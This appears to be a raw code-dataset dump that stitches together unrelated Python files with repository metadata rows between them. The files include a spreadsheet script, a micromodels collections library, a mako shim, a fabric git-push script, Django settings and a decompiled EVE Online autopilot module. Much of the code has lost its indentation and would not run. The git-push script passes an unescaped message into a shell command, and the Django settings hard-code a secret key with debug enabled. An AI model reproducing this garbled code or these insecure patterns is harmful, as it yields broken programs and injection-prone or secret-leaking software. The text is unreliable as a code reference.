import ecef
import pickle
import json
wb = load_workbook("C:\Users\sglvladi\Documents\WebSync\University of Liverpool\PhD\resources\geolife.xlsx")
gps_data = wb['Sheet1']
in_file = open("/home/sglvladi/Mini_Challenge_2/cart_table.txt","r");
i=1;
for line in in_file:
tokens = line.split(",")
taxi_id = tokens[0]
timestamp = tokens[1]
lat = tokens[2]
long = tokens[3]
gps_data["A%s"%i]=taxi_id
gps_data["B%s"%i]=timestamp
gps_data["C%s"%i]=lat
gps_data["D%s"%i]=long
| [
"sglvladi@gmail.com"
] | sglvladi@gmail.com |
e63f9b6c0744c053c48c90909cbf38b01602bcd6 | fadff32aecd82fb9a0925895b437b4c6d994f50b | /microcollections/collections.py | 74946405d62be4c5ee41479296eb1c1de8cbf2dd | [] | no_license | zbyte64/micromodels-collections | 638e6551d7c7dc9092818a65695023eaa8c51bd5 | a7e7a0715f18ade96745321892a0dbafd9e04dac | refs/heads/master | 2021-01-13T02:18:44.343841 | 2014-02-20T00:57:03 | 2014-02-20T00:57:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,149 | py | # -*- coding: utf-8 -*-
import micromodels
class NotSet:
    """Sentinel type used to distinguish "argument omitted" from ``None``."""
    pass
class CollectionQuery(object):
def __init__(self, collection, params):
self.collection = collection
self.params = params
self._cache = dict()
@property
def model(self):
return self.collection.model
@property
def data_store(self):
return self.collection.data_store
def get(self, **params):
if params:
return self.clone(**params).get()
if 'get' not in self._cache:
result = self.data_store.get(self.collection, self.params)
self._cache['get'] = \
self.data_store.load_instance(self.collection, result)
return self._cache['get']
def __iter__(self):
self._cache.setdefault('objects', dict())
if 'results' not in self._cache:
self.find()
#yield cached objects
index = 0
while index in self._cache['objects']:
yield self._cache['objects'][index]
index += 1
#yield objects not yet loaded
for index, result in self._cache['results']:
if index not in self._cache['objects']: # redundant
self._cache['objects'][index] = \
self.data_store.load_instance(self.collection, result)
yield self._cache['objects'][index]
def __getitem__(self, index):
#TODO communicate to backend so that we don't fetch more then we need
self._cache.setdefault('objects', dict())
if 'results' not in self._cache:
self.find()
if isinstance(index, slice):
def sliced_gen():
for y, obj in enumerate(iter(self)):
if y >= index.start and y < index.stop:
yield obj
return sliced_gen()
else:
if index in self._cache['objects']:
return self._cache['objects'][index]
else:
for y, obj in enumerate(iter(self)):
if y == index:
return obj
raise KeyError('Not found: %s' % index)
def __len__(self):
return self.count()
def find(self, **params):
if params:
return self.clone(**params).find()
if not self.params:
return self.all()
if 'results' not in self._cache:
results = self.data_store.find(self.collection, self.params)
self._cache['results'] = enumerate(results)
return iter(self)
def first(self, **params):
if params:
return self.clone(**params).first()
if not self.params:
return self.all().next()
if 'results' not in self._cache:
results = self.data_store.find(self.collection, self.params)
self._cache['results'] = enumerate(results)
try:
return iter(self).next()
except StopIteration:
return None
def all(self):
if self.params:
return self.find()
if 'results' not in self._cache:
results = self.data_store.all(self.collection)
self._cache['results'] = enumerate(results)
return iter(self)
def delete(self):
return self.data_store.delete(self.collection, self.params)
def count(self):
if 'count' not in self._cache:
self._cache['count'] = \
self.data_store.count(self.collection, self.params)
return self._cache['count']
def keys(self):
if 'keys' not in self._cache:
self._cache['keys'] = \
self.data_store.keys(self.collection, self.params)
return self._cache['keys']
def exists(self, **params):
if params:
return self.clone(**params).exists()
if 'exists' not in self._cache:
self._cache['exists'] = \
self.data_store.exists(self.collection, self.params)
return self._cache['exists']
def clone(self, **params):
    """
    Return a fresh query of the same type over the same collection,
    with *params* merged over this query's params (new values win).
    """
    merged = dict(self.params)
    merged.update(params)
    return type(self)(self.collection, merged)
class CRUDHooks(object):
    """
    No-op lifecycle callbacks for collection CRUD operations.

    Subclasses override individual hooks to observe or transform the
    value flowing through each stage; every default implementation
    simply hands its argument straight back.
    """

    def modelRegistered(self, model):
        """Called once when *model* is bound to a collection."""
        return model

    def afterInitialize(self, instance):
        """Called after a new (unsaved) instance is constructed."""
        return instance

    def beforeCreate(self, params):
        """Called with the keyword params just before create()."""
        return params

    def afterCreate(self, instance):
        """Called with the freshly created, saved instance."""
        return instance

    def beforeSave(self, instance):
        """Called before an instance is persisted."""
        return instance

    def afterSave(self, instance):
        """Called after an instance has been persisted."""
        return instance

    def beforeRemove(self, instance):
        """Called before an instance is removed from the store."""
        return instance

    def afterRemove(self, instance):
        """Called after an instance has been removed."""
        return instance

    #CONSIDER: ids or params?
    def afterDelete(self):
        """Called after a bulk delete; there is no per-instance payload."""
        return
class BaseCollection(CRUDHooks):
    """
    Dictionary-flavoured CRUD facade over a data store "collection".

    Subclasses supply ``model`` (the instance factory), ``object_id_field``
    (the attribute/key holding the primary key), ``id_generator`` (fallback
    key factory), ``params`` (collection-level default filters) and a
    ``data_store`` attribute.  Querying is delegated to CollectionQuery
    objects built by get_query().

    Fixes in this revision:
      * ``pop`` now checks the NotSet sentinel by identity (``is``), not
        equality, so a default with a permissive ``__eq__`` cannot be
        mistaken for "no default given".
      * ``setdefault`` now follows dict semantics and returns the stored
        value (previously it returned None).
    """
    model = None
    object_id_field = None
    id_generator = None
    params = dict()

    def get_query(self, **params):
        """Build a CollectionQuery, merging in this collection's default
        params (collection defaults win over the caller's params)."""
        if self.params:
            params.update(self.params)
        return CollectionQuery(self, params)

    def get_loader(self):
        """Return the callable used to materialize stored rows."""
        return self.model

    def get_object_id(self, instance):
        """Return the primary key of *instance* (dict-style lookup),
        falling back to id_generator; callables are invoked."""
        object_id = instance.get(self.object_id_field, self.id_generator)
        if callable(object_id):
            object_id = object_id()
        return object_id

    def get_serializable(self, instance):
        '''
        Returns an object representation that can be easily serialized
        '''
        return instance

    ## Dictionary like methods ##

    def __setitem__(self, key, instance):
        # Stamp the key onto the instance (dict item or attribute) and
        # persist it under that key.
        if self.object_id_field:
            if hasattr(instance, '__setitem__'):
                instance[self.object_id_field] = key
            elif hasattr(instance, self.object_id_field):
                setattr(instance, self.object_id_field, key)
        return self.save(instance, key)

    def __getitem__(self, key):
        return self.get(pk=key)

    def __delitem__(self, key):
        return self.find(pk=key).delete()

    def __contains__(self, key):
        return self.exists(pk=key)

    def __len__(self):
        return self.count()

    def keys(self):
        return self.get_query().keys()

    def values(self):
        return self.all()

    def items(self):
        #TODO make efficient
        for key in self.keys():
            yield (key, self.get(key))

    def extend(self, items):
        """list.extend flavour: save every instance in *items*."""
        for item in items:
            self.save(item)

    def update(self, items):
        """dict.update flavour: store every (key, value) pair of *items*."""
        for key, value in items.items():
            self[key] = value

    def pop(self, key, default=NotSet):
        """Remove and return the instance stored under *key*; return
        *default* (when given) if the key is absent."""
        try:
            instance = self[key]
        except (KeyError, IndexError):
            if default is NotSet:
                raise
            return default
        instance.remove()
        return instance

    def has_key(self, key):
        return key in self

    def clear(self):
        """Delete every instance in the collection."""
        self.delete()

    def setdefault(self, key, value):
        """dict.setdefault flavour: store *value* under *key* when absent
        and return the value now associated with *key*."""
        if key in self:
            return self[key]
        self[key] = value
        return value

    def copy(self):
        """Materialize the whole collection as a plain dict."""
        return dict(self.items())

    def get(self, pk=NotSet, _default=None, **params):
        '''
        Returns a single object matching the query params
        Returns *_default* (None by default) if no object matches
        '''
        if pk is not NotSet:
            params['pk'] = pk
        try:
            return self.get_query(**params).get()
        except (KeyError, IndexError):
            return _default

    ## Query Methods ##

    def first(self, **params):
        '''
        Returns a single object matching the query params
        Returns None if no object matches
        '''
        return self.get_query(**params).first()

    def find(self, **params):
        '''
        Returns a query object that iterates over instances matching the query params
        '''
        return self.get_query(**params)

    def exists(self, **params):
        '''
        Returns a boolean on whether objects match the query params
        '''
        return self.get_query(**params).exists()

    def new(self, **params):
        '''
        Instantiates and returns a new instance
        '''
        instance = self.model(**params)
        return self.afterInitialize(instance)

    def create(self, **params):
        '''
        Saves a new instance
        '''
        instance = self.new(**params)
        return self.save(instance)

    def save(self, instance, key=None):
        return self.data_store.save(self, instance, key)

    def remove(self, instance):
        return self.data_store.remove(self, instance)

    def all(self):
        return self.get_query()

    def delete(self):
        return self.get_query().delete()

    def count(self):
        return self.get_query().count()

    def __iter__(self):
        return self.get_query().__iter__()
class RawCollection(BaseCollection):
    '''
    A collection that returns dictionaries and responds like a dictionary
    '''
    object_id_field = 'id'

    def __init__(self, data_store=None, model=dict, name=None,
            object_id_field=None, id_generator=None, params=None):
        """
        :param data_store: backend store; defaults to MemoryDataStore
        :param model: factory for returned instances (dict by default)
        :param name: backend collection name
        :param object_id_field: overrides the class-level 'id' key
        :param id_generator: key factory used when an instance has no id
        :param params: collection-level default query params
        """
        if data_store is None:
            from .datastores import MemoryDataStore
            data_store = MemoryDataStore
        # NOTE(review): the original contained the no-op
        # ``if callable(data_store): data_store = data_store`` -- removed
        # here as dead code.  It may have been intended to read
        # ``data_store = data_store()`` (instantiate a passed class);
        # confirm against the data-store API before making that change.
        self.data_store = data_store
        self.model = model
        self.name = name
        self.params = params or dict()
        if object_id_field:
            self.object_id_field = object_id_field
        if id_generator:
            self.id_generator = id_generator
        super(RawCollection, self).__init__()

    ## Hooks ##

    def beforeSave(self, instance):
        """Ensure the instance carries its own primary key before it is
        persisted (dict item when possible, attribute otherwise)."""
        #set the id field if we have one
        if self.object_id_field:
            key = self.get_object_id(instance)
            if hasattr(instance, '__setitem__'):
                instance[self.object_id_field] = key
            else:
                setattr(instance, self.object_id_field, key)
        return super(RawCollection, self).beforeSave(instance)
class Collection(RawCollection):
    '''
    A collection bound to a schema and returns model instances
    '''

    def __init__(self, model, data_store=None, name=None,
            object_id_field=None, id_generator=None, params=None):
        # Default the backend collection name to the model's class name.
        collection_name = model.__name__ if name is None else name
        super(Collection, self).__init__(model=model, data_store=data_store,
            name=collection_name, object_id_field=object_id_field,
            id_generator=id_generator, params=params)

    def prepare_model(self, model):
        '''
        Legacy hook, you shouldn't modify the model, but if you do return a new
        class
        '''
        return self.modelRegistered(model)

    def get_loader(self):
        '''
        Returns a callable that returns an instantiated model instance
        '''
        # Prepare lazily, exactly once, and reuse the prepared class.
        if not hasattr(self, '_prepped_model'):
            self._prepped_model = self.prepare_model(self.model)
        return self._prepped_model

    def get_object_id(self, instance):
        """Read the primary key off the model by attribute access (unlike
        the dict lookup used by RawCollection); callables are invoked."""
        found = getattr(instance, self.object_id_field, self.id_generator)
        return found() if callable(found) else found

    def get_serializable(self, instance):
        """Serialize through the model's own to_dict()."""
        return instance.to_dict(serial=True)

    def modelRegistered(self, model):
        """Bind the model back to this collection and graft save/remove
        convenience methods onto it when the model lacks them."""
        model._collection = self
        if not hasattr(model, 'remove'):
            def remove(instance):
                return self.remove(instance)
            model.remove = remove
        if not hasattr(model, 'save'):
            def save(instance):
                return self.save(instance)
            model.save = save
        return super(Collection, self).modelRegistered(model)
class PolymorphicLoader(object):
    '''
    Returns the proper model class based on the object type field
    '''

    def __init__(self, poly_collection):
        self.collection = poly_collection

    def __call__(self, **values):
        """Resolve the concrete model for *values* by its stored object
        type, then construct and return an instance from those values."""
        coll = self.collection
        type_tag = coll.get_object_type_from_values(values)
        model_cls = coll.get_model(type_tag)
        return model_cls(**values)
class PolymorphicCollection(Collection):
    '''
    A collection representing mixed objects

    Instances of different registered model subclasses live side by side;
    each stored row carries its concrete type tag in ``_object_type`` and
    its full ancestry in ``_object_types`` so rows can be loaded back as
    the right class and queried by any ancestor type.
    '''
    object_type_field = '_object_type'
    object_types_field = '_object_types'

    def __init__(self, model, *args, **kwargs):
        self.prepped_base_model = self.prepare_model(model)
        # object_type => model
        self.descendent_registry = dict()
        # model => (object_type, object_types)
        self.reverse_descendent_registry = dict()
        super(PolymorphicCollection, self).__init__(model, *args, **kwargs)

    def get_loader(self):
        return PolymorphicLoader(self)

    def get_model(self, object_type):
        """Return the registered model for *object_type*, lazily loading
        it first; fall back to the prepared base model when unknown."""
        if object_type not in self.descendent_registry:
            self.load_model(object_type)
        return self.descendent_registry.get(object_type,
            self.prepped_base_model)

    def load_model(self, object_type):
        #import and add model here
        pass

    def extract_object_type(self, cls):
        """Return the canonical "<module>.<ClassName>" tag for *cls*.

        Bug fix: the original read ``'%s.%s' (cls.__module__, ...)`` --
        the ``%`` operator was missing, so every call raised
        ``TypeError: 'str' object is not callable``.
        """
        return '%s.%s' % (cls.__module__, cls.__name__)

    def register_model(self, model):
        '''
        Registers a new model to belong in the collection
        '''
        if not issubclass(model, (self.model, self.prepped_base_model)):
            return
        model = self.prepare_model(model)
        object_type = self.extract_object_type(model)
        object_types = [object_type]
        def collect_parents(bases):
            # NOTE(review): only direct bases are inspected (recursion
            # happens only for tuple entries, which __bases__ does not
            # normally contain) -- confirm whether deeper ancestry should
            # be collected before relying on findType across grandparents.
            for entry in bases:
                if isinstance(entry, tuple):
                    collect_parents(entry)
                elif issubclass(entry, micromodels.Model):
                    parent_type = self.extract_object_type(entry)
                    if parent_type not in object_types:
                        object_types.append(parent_type)
        collect_parents(model.__bases__)
        self.descendent_registry[object_type] = model
        self.reverse_descendent_registry[model] = (object_type, object_types)

    def get_object_type(self, instance):
        '''
        Return a string representing the model instance type
        '''
        model = type(instance)
        if model in self.reverse_descendent_registry:
            return self.reverse_descendent_registry[model][0]
        object_type = getattr(instance, self.object_type_field, None)
        if object_type is None:
            object_type = self.extract_object_type(type(instance))
        if callable(object_type):
            object_type = object_type()
        return object_type

    def get_object_types(self, instance):
        '''
        Return a list of strings representing the various inherritted types of
        the model instance
        '''
        model = type(instance)
        if model in self.reverse_descendent_registry:
            return self.reverse_descendent_registry[model][1]
        object_types = getattr(instance, self.object_types_field, None)
        if callable(object_types):
            object_types = object_types()
        return object_types

    def get_object_type_from_values(self, values):
        """Read the stored type tag out of a raw value mapping."""
        return values.get(self.object_type_field, None)

    def afterInitialize(self, instance):
        # Stamp the type tag and ancestry onto every new instance so they
        # round-trip through the data store.
        object_type = self.get_object_type(instance)
        if object_type:
            instance.add_field(self.object_type_field, object_type,
                micromodels.CharField())
        else:
            assert False, 'Why is object type None?'
        object_types = self.get_object_types(instance)
        if object_types:
            assert len(set(object_types)) == len(object_types), 'Duplicate object types detected'
            instance.add_field(self.object_types_field, object_types,
                micromodels.FieldCollectionField(micromodels.CharField()))
        else:
            assert False, 'Why is object types None?'
        return super(PolymorphicCollection, self).afterInitialize(instance)

    def findType(self, cls, **params):
        """Query for instances whose ancestry includes *cls*."""
        object_type = self.extract_object_type(cls)
        params[self.object_types_field] = object_type
        return self.find(**params)
| [
"zbyte64@gmail.com"
] | zbyte64@gmail.com |
9091a2f5ad5a8f44c3e29f97f9374e60cd235cc9 | f24ebd0ee446e95f3953dbb840526fc6d299b13d | /env/bin/mako-render | 3c7ef53c1046d6470bca23a4441bcbea53b58523 | [] | no_license | hendro15/flaskFramework | 158f8f01aeec12e26d88f1a1522a93303ff32468 | 306a5b4885fdb4549d0472eac6fbd99b7986f949 | refs/heads/master | 2020-04-08T19:11:39.063975 | 2018-11-29T11:17:21 | 2018-11-29T11:17:21 | 159,644,343 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | #!/home/sonic/Documents/latihan/flaskPACKT/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from mako.cmd import cmdline
if __name__ == '__main__':
    # Console-script shim (as installed by setuptools): normalize argv[0]
    # by stripping any "-script.py(w)"/".exe" wrapper suffix, then hand
    # off to mako's command-line entry point.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(cmdline())
| [
"hendro.prabowo15@gmail.com"
] | hendro.prabowo15@gmail.com | |
f25fea41a8eb4d8286b1e6c59fff5b38cabfa4f1 | bc49f67a1dc4cb0d9ce8b4a366ba79fb83782eda | /scripts/version_control/gitpush.py | 64cebcaa532c24958f3cd555d5393782b21f5efd | [] | no_license | kchida/dot-files | ab5a229f03474edbb7ff19159c4da559028d4349 | 884b8fbfc404df0bf994d293e1253f787550f2fd | refs/heads/master | 2022-10-21T02:18:07.206751 | 2022-08-13T19:43:15 | 2022-08-13T19:43:15 | 4,061,849 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py | #!/usr/bin/env python
from fabric.api import local, lcd, prompt
# Ask for a commit message, then stage everything, commit and push.
message = prompt('Enter your commit message: ')
# NOTE(review): `message` is interpolated into a shell command unescaped;
# a double quote (or $(), backticks) in the message breaks -- or injects
# into -- the command line.  Consider shell-quoting the message.
local('git add -A . && git commit -m "%s" && git push origin' % message)
| [
"kenchida2@gmail.com"
] | kenchida2@gmail.com |
04b5a1dc61e840f5fcda2ada41e6e4e0c4e397f5 | 66cef11807c3a0fc53bce2419865d8997d5c44ab | /software_bind/software_bind/settings.py | 3da20839ba752a4b736b3ed4ed36fa4c9d6e582c | [] | no_license | GrtSid/software_fuse | 1f7c77472449ca00b6cdeb0ac3243903649fb8df | 3f6f5a5f9d92c8593151901b7fec41ab8687dcd1 | refs/heads/master | 2021-09-23T01:08:19.730330 | 2020-02-26T18:33:16 | 2020-02-26T18:33:16 | 240,294,575 | 0 | 0 | null | 2021-09-22T18:39:06 | 2020-02-13T15:32:02 | Python | UTF-8 | Python | false | false | 3,348 | py | """
"""
Django settings for software_bind project.

Generated by 'django-admin startproject' using Django 3.0.3.

For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Project-level template directory, wired into TEMPLATES['DIRS'] below.
template_dir = os.path.join(BASE_DIR,'templates')

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '!4b94rixsu(87bj5(s-ch5=3*lox80xnshay3h73yp7s+fryxy'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []

# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'api',
    'account',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'software_bind.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [template_dir],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'software_bind.wsgi.application'

# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Authentication redirects used by django.contrib.auth views.
LOGIN_URL = 'login'
LOGIN_REDIRECT_URL = 'home'

# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS=[os.path.join(BASE_DIR,"static"),]
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
"siddhantagarwal99@gmail.com"
] | siddhantagarwal99@gmail.com |
0d7612855c30e129d873683d5f7f339e5fd16d61 | aad164e4efe1d55cc189c35956bfd435b14a0f52 | /eve-8.21.494548/eve/client/script/parklife/autopilot.py | 633cb52208bb534d30fdf32b77f2d3a6d17944d3 | [] | no_license | Pluckyduck/eve | 61cc41fe8fd4dca4fbdcc4761a37bcfeb27ed84f | 9a277707ab1f162c6bd9618faf722c0be3ea93ad | refs/heads/master | 2020-12-28T23:35:29.992875 | 2013-05-06T14:24:33 | 2013-05-06T14:24:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,327 | py | #Embedded file name: c:/depot/games/branches/release/EVE-TRANQUILITY/eve/client/script/parklife/autopilot.py
import util
import destiny
import base
import service
import sys
import uthread
import blue
import log
import localization
import uiconst
from collections import defaultdict
AUTO_NAVIGATION_LOOP_INTERVAL_MS = 2000
class AutoPilot(service.Service):
    """
    EVE client autopilot service: follows the route set in the star map,
    warping to / jumping through stargates and docking at the final
    station.  Decompiled source -- indentation reconstructed.
    """
    __guid__ = 'svc.autoPilot'
    __exportedcalls__ = {'SetOn': [],
     'SetOff': [],
     'GetState': []}
    __notifyevents__ = ['OnBallparkCall', 'OnSessionChanged', 'OnRemoteMessage']
    __dependencies__ = ['michelle', 'starmap']

    def __init__(self):
        service.Service.__init__(self)
        # base.AutoTimer that drives Update(); None while disabled.
        self.updateTimer = None
        # 1 while the autopilot is engaged, 0 otherwise.
        self.autopilot = 0
        # Number of Update() ticks to skip (set after jumps/session changes).
        self.ignoreTimerCycles = 0
        self.isOptimizing = False
        # Targets of the two "approach/warp then run a command" helpers.
        self.approachAndTryTarget = None
        self.warpAndTryTarget = None
        # State for the newer NavigateSystemTo flow (behind a kill switch).
        self.__navigateSystemDestinationItemID = None
        self.__navigateSystemThread = None
        uthread.new(self.UpdateWaypointsThread).context = 'autoPilot::UpdateWaypointsThread'

    def UpdateWaypointsThread(self):
        # Re-apply saved waypoints shortly after startup so the route UI
        # is rebuilt for the current session.
        blue.pyos.synchro.SleepWallclock(2000)
        starmapSvc = sm.GetService('starmap')
        waypoints = starmapSvc.GetWaypoints()
        if len(waypoints):
            starmapSvc.SetWaypoints(waypoints)
def Run(self, memStream = None):
    # Service startup: begin the Update() polling loop immediately.
    service.Service.Run(self, memStream)
    self.StartTimer()

def SetOn(self):
    """Engage the autopilot (idempotent) and restart the update timer."""
    if self.autopilot == 1:
        return
    self.autopilot = 1
    # Cancel whichever manual-navigation helper flow is active; which one
    # exists depends on the server-side kill switch for the newer flow.
    if not sm.GetService('machoNet').GetGlobalConfig().get('newAutoNavigationKillSwitch', False):
        self.CancelSystemNavigation()
    else:
        self.AbortApproachAndTryCommand()
        self.AbortWarpAndTryCommand()
    sm.ScatterEvent('OnAutoPilotOn')
    eve.Message('AutoPilotEnabled')
    self.KillTimer()
    self.StartTimer()
    self.LogNotice('Autopilot Enabled')

def OnSessionChanged(self, isremote, session, change):
    # After any session change (jump, dock, ...) pause a few cycles and
    # refresh the displayed route.
    self.KillTimer()
    self.ignoreTimerCycles = 3
    self.StartTimer()
    sm.GetService('starmap').UpdateRoute(fakeUpdate=True)
def SetOff(self, reason = ''):
    """Disengage the autopilot; *reason* selects the user notification."""
    if self.autopilot == 0:
        self.KillTimer()
        return
    sm.ScatterEvent('OnAutoPilotOff')
    self.autopilot = 0
    # The reason strings double as message selectors (see Update()).
    if reason == ' - waypoint reached':
        eve.Message('AutoPilotWaypointReached')
    elif reason == ' - no destination path set':
        eve.Message('AutoPilotDisabledNoPathSet')
    else:
        eve.Message('AutoPilotDisabled')
    self.LogNotice('Autopilot Disabled', reason)

def OnRemoteMessage(self, msgID, *args, **kwargs):
    # A fleet warp overrides any in-system auto navigation in progress.
    if msgID == 'FleetWarp':
        self.LogInfo('Canceling auto navigation due to fleet warp detected')
        self.CancelSystemNavigation()
def OnBallparkCall(self, functionName, args):
    """
    React to destiny (movement) commands issued for our own ship:
    cancel auto navigation when the player steers manually, and shut the
    autopilot off on manual Goto commands.

    NOTE(review): indentation reconstructed from decompiled source.
    """
    functions = ['GotoDirection', 'GotoPoint']
    if args[0] != eve.session.shipid:
        return
    if not sm.GetService('machoNet').GetGlobalConfig().get('newAutoNavigationKillSwitch', False):
        # New flow: cancel only when the command conflicts with the
        # current auto-navigation destination.
        cancelAutoNavigation = False
        if self.__navigateSystemDestinationItemID is None:
            pass
        elif functionName in {'GotoDirection', 'GotoPoint', 'Orbit'}:
            cancelAutoNavigation = True
        elif functionName == 'FollowBall' and self.__navigateSystemDestinationItemID != args[1]:
            cancelAutoNavigation = True
        if cancelAutoNavigation:
            self.LogInfo('Canceling auto navigation to', self.__navigateSystemDestinationItemID, 'as a respons to OnBallparkCall:', functionName, args)
            self.CancelSystemNavigation()
    else:
        # Legacy flow: abort the approach/warp-and-try helpers.
        approachAndTryFunctions = ['GotoDirection',
         'GotoPoint',
         'FollowBall',
         'Orbit',
         'WarpTo']
        warpAndTryFunctions = ['GotoDirection',
         'GotoPoint',
         'FollowBall',
         'Orbit']
        if functionName in approachAndTryFunctions:
            if functionName != 'FollowBall' or self.approachAndTryTarget != args[1]:
                self.AbortApproachAndTryCommand()
        if functionName in warpAndTryFunctions:
            self.AbortWarpAndTryCommand()
    if functionName in functions:
        if functionName == 'GotoDirection' and self.gotoCount > 0:
            self.gotoCount = 0
            self.LogInfo('Autopilot gotocount set to 0')
            return
        if self.gotoCount == 0:
            # Keep running if the route ends at a station (docking flow).
            waypoints = sm.GetService('starmap').GetWaypoints()
            if waypoints and util.IsStation(waypoints[-1]):
                return
        self.SetOff(functionName + str(args))
        self.LogInfo('Autopilot stopped gotocount is ', self.gotoCount)

def GetState(self):
    # 1 when engaged, 0 when off.
    return self.autopilot
def Stop(self, stream):
    # Service shutdown: stop polling before tearing the service down.
    self.KillTimer()
    service.Service.Stop(self)

def KillTimer(self):
    # Dropping the AutoTimer reference stops the periodic Update() calls.
    self.updateTimer = None

def StartTimer(self):
    # Poll Update() every 2 seconds; gotoCount tracks manual Goto resets.
    self.gotoCount = 0
    self.updateTimer = base.AutoTimer(2000, self.Update)
def Update(self):
    """
    One autopilot tick: locate the next waypoint object in the current
    ballpark, then jump through it, dock at it, approach it or warp to
    it depending on type and distance.

    NOTE(review): indentation reconstructed from decompiled source.
    """
    if self.autopilot == 0:
        self.KillTimer()
        return
    elif self.ignoreTimerCycles > 0:
        # Cooling down after a jump / session change.
        self.ignoreTimerCycles = self.ignoreTimerCycles - 1
        return
    elif not session.IsItSafe():
        self.LogInfo('returning as it is not safe')
        return
    elif not session.rwlock.IsCool():
        self.LogInfo("returning as the session rwlock isn't cool")
        return
    else:
        starmapSvc = sm.GetService('starmap')
        destinationPath = starmapSvc.GetDestinationPath()
        if len(destinationPath) == 0:
            self.SetOff(' - no destination path set')
            return
        elif destinationPath[0] == None:
            self.SetOff(' - no destination path set')
            return
        bp = sm.GetService('michelle').GetBallpark()
        if not bp:
            return
        elif sm.GetService('jumpQueue').IsJumpQueued():
            return
        ship = bp.GetBall(session.shipid)
        if ship is None:
            return
        elif ship.mode == destiny.DSTBALL_WARP:
            # Already warping; wait for arrival.
            return
        # Find the ball for the next hop: either a stargate leading to
        # the next system on the path, or the destination item itself.
        destID = None
        destItem = None
        for ballID in bp.balls.iterkeys():
            slimItem = bp.GetInvItem(ballID)
            if slimItem == None:
                continue
            if slimItem.groupID == const.groupStargate and destinationPath[0] in map(lambda x: x.locationID, slimItem.jumps):
                destID = ballID
                destItem = slimItem
                break
            elif destinationPath[0] == slimItem.itemID:
                destID = ballID
                destItem = slimItem
                break
        if destID is None:
            return
        jumpingToCelestial = not util.IsSolarSystem(destinationPath[0])
        theJump = None
        if not jumpingToCelestial:
            for jump in destItem.jumps:
                if destinationPath[0] == jump.locationID:
                    theJump = jump
                    break
        if theJump is None and not jumpingToCelestial:
            return
        approachObject = bp.GetBall(destID)
        if approachObject is None:
            return
        if jumpingToCelestial:
            jumpToLocationName = cfg.evelocations.Get(destinationPath[0]).name
        else:
            jumpToLocationName = cfg.evelocations.Get(theJump.locationID).name
        shipDestDistance = bp.GetSurfaceDist(ship.id, destID)
        if shipDestDistance < const.maxStargateJumpingDistance and not jumpingToCelestial:
            # Close enough to a stargate: attempt the jump, after a run of
            # sanity checks that the session is in a stable state.
            if ship.isCloaked:
                return
            if session.mutating:
                self.LogInfo('session is mutating')
                return
            if session.changing:
                self.LogInfo('session is changing')
                return
            if bp.solarsystemID != session.solarsystemid:
                self.LogInfo('bp.solarsystemid is not solarsystemid')
                return
            if sm.GetService('michelle').GetRemotePark()._Moniker__bindParams != session.solarsystemid:
                self.LogInfo('remote park moniker bindparams is not solarsystemid')
                return
            try:
                self.LogNotice('Autopilot jumping from', destID, 'to', theJump.toCelestialID, '(', jumpToLocationName, ')')
                sm.GetService('sessionMgr').PerformSessionChange('autopilot', sm.GetService('michelle').GetRemotePark().CmdStargateJump, destID, theJump.toCelestialID, session.shipid)
                eve.Message('AutoPilotJumping', {'what': jumpToLocationName})
                sm.ScatterEvent('OnAutoPilotJump')
                self.ignoreTimerCycles = 5
            except UserError as e:
                if e.msg == 'SystemCheck_JumpFailed_Stuck':
                    self.SetOff()
                    raise
                elif e.msg.startswith('SystemCheck_JumpFailed_'):
                    eve.Message(e.msg, e.dict)
                elif e.msg == 'NotCloseEnoughToJump':
                    # Server disagreed about the distance; creep closer.
                    park = sm.GetService('michelle').GetRemotePark()
                    park.CmdSetSpeedFraction(1.0)
                    shipui = uicore.layer.shipui
                    if shipui.isopen:
                        shipui.SetSpeed(1.0)
